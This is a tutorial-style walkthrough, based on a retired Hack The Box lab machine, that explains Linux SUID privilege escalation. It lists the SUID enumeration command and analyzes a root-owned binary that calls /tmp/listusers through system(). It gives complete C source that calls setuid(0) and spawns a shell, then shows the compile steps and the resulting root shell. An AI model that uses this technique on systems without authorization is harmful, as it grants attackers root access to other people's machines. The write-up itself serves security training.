SUID Binary Exploit – A Primer

SUID (Set owner User ID upon execution) is a special permission bit on a file. Normally, when a program runs on Linux/Unix it inherits the access rights of the user who launched it. With the SUID bit set, the process instead runs with the effective privileges of the file's owner rather than those of the user running it. Enumerating files with this bit is one of the first steps a penetration tester performs after the initial foothold when trying to escalate privileges. The following command lists all regular files with the SUID bit set:
find / -perm -u=s -type f 2>/dev/null

Let's look at an example of how we can leverage this to escalate our privileges. As a penetration tester we now have a foothold on the target as a low-privileged user. Let's run that command and see what we find.

user@target:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

user@target:~$ ls -latr /usr/bin/viewuser
-rwsr-xr-x 1 root root 7328 May 16  2018 /usr/bin/viewuser

Looking at the output, the binary /usr/bin/viewuser stands out: it is owned by root with the SUID bit set (the s in -rwsr-xr-x), and it does not appear to be part of a standard Linux install. Let's take a peek at it with the strings command: strings /usr/bin/viewuser | less

/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setuid
puts
system
__cxa_finalize
__libc_start_main
GLIBC_2.0
GLIBC_2.1.3
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
UWVS
[^_]
/tmp/listusers
;*2$"
GCC: (Debian 7.2.0-8) 7.2.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.6586
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
viewuser.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start

Notice the line /tmp/listusers, together with the imported setuid and system symbols. viewuser apparently calls setuid and then hands that path to system(), i.e. it runs /tmp/listusers through /bin/sh. Because /tmp is world-writable, any user on the box can control what sits at that path. So what we will do is create our own binary named listusers and have the parent binary call that instead. The binary we create will spawn a shell. Since the SUID bit is set and the owner of viewuser is, you guessed it, root, viewuser runs with an effective UID of 0, and any child it launches inherits that, so the shell spawns as root. Let's do it then.

Let's navigate to /tmp and move any existing listusers aside, e.g. mv listusers listusers.bak (since /tmp has the sticky bit set, this only works if the file is yours or absent; here it belongs to user, as the listing further down shows). Now create a C file, say listusers.c, with the following contents, compile it with gcc and name the output file listusers. The setuid(0) call matters: it makes the real UID 0 as well as the effective UID, so the shell stays root even if /bin/sh happens to be bash, which drops an effective UID that differs from the real one unless started with -p.

user@target:/tmp$ cat listusers.c 
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid() */

int main(int argc, char **argv) {
	setuid(0);            /* effective uid is already 0 via viewuser; make the real uid 0 too */
	system("/bin/sh -i"); /* interactive shell, now running fully as root */
	return 0;
}

user@target:/tmp$ gcc listusers.c -o listusers
user@target:/tmp$ ls -ltr
-rwxr-xr-x 1 user user   19 May 26 23:40 listusers.bak
-rw-r--r-- 1 user user   83 May 29 20:49 listusers.c
-rwxr-xr-x 1 user user 5040 May 29 20:52 listusers

Now all that is left to do is execute /usr/bin/viewuser; it should run our listusers and spawn a shell as root.

user@target:/tmp$ /usr/bin/viewuser 
(unknown) :0           2019-05-26 22:01 (:0)
user pts/0        2019-05-29 20:36 (10.10.14.23)
# id
uid=0(root) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
# whoami
root

This is the overall idea behind the majority of SUID binary exploits: a privileged binary invokes another program by a path (or by an unqualified name resolved through PATH) that a low-privileged user can control, so the user substitutes their own code and inherits the owner's privileges. Note that the gid in the id output is still 1000(user): listusers.c only called setuid(0), not setgid(0), so only the UID changed.

Reference: This tutorial is based on a wonderful box named “Irked” in Hack The Box which has now retired.
